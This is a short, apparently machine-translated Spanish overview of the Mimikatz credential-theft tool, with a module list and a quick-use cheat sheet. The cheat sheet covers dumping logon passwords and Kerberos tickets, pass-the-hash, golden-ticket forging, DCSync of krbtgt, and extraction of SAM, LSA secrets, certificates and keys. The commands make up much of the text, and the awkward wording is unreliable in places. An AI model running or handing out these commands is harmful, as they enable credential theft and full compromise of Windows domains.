Mimikatz es un gadget de código abierto escrito en C, lanzado en abril de 2014. Es muy potente, es compatible con la memoria del sistema de Windows para extraer contraseña de texto claro, hash, código PIN y credenciales de Kerberos, y pass-the-hash, pass-the -ticket, construir boletos de oro y otra tecnología de piratería. Viene en dos sabores: x64 o Win32 , dependiendo de su versión de Windows (32/64 bits).
El sabor de Win32 no puede acceder a 64 bits de memoria de proceso (como lsass ) pero puede abrir un minivolcado de 32 bits en Windows 64 bits.
Algunas operaciones necesitan privilegios de administrador o token del sistema , así que tenga en cuenta el UAC de la versión de Vista .



Y en conjunto, puede leer las credenciales de la contraseña del sistema de la máquina virtual.

Módulos
estándar
privilegio
crypto
sekurlsa
Kerberos
lsadump
bóveda
simbólico
evento
ts
proceso
Servicio
red
Misc
biblioteca mimilib
driver mimidrv

Uso rápido
privilege::debug
 sekurlsa

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export
 sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

Kerberos

kerberos::list /export
 kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng
 crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
 crypto::keys /export
crypto::keys /machine /export

bóveda y lsadump

vault::cred
 vault::list
 token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
 lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz 2.1.0 20180527 ha sido lanzado.